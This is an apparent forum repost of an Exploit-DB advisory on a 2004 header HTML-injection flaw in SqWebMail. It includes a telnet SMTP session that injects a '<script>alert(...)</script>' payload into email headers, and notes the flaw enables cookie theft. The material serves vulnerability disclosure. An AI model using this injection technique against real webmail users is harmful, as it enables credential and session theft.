Exploit SqWebMail 4.0.4.20040524 - Email Header HTML Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24227
Проверка EDB
  1. Пройдено
Автор
LUCA LEGATO
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2004-0591
Дата публикации
2004-06-21
Код:
source: https://www.securityfocus.com/bid/10588/info

SqWebMail is reported to be prone to an email header HTML injection vulnerability. This issue presents itself due to a failure of the application to properly sanitize user-supplied email header strings.

The problem presents itself when an unsuspecting user views an email message containing malicious HTML and script code in the email header. 

An attacker can exploit this issue to gain access to an unsuspecting user's cookie based authentication credentials.

1) sending a raw email message with malformed headers, i.e.
"<script>alert(document.location)</script>":

ashanti@dns:~$ telnet localhost 25
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
220 x.x.x.x ESMTP
helo foo
250 x.x.x.x
mail from:<[email protected]>
250 ok
rcpt to:<[email protected]>
250 ok
data
354 go ahead
<script>alert(document.location)</script>
.
[...]

2) sending a raw email message with the MIME Content-Type header set to
"message/delivery-status" with malformed content (see 1 above).
 
Источник
www.exploit-db.com

Похожие темы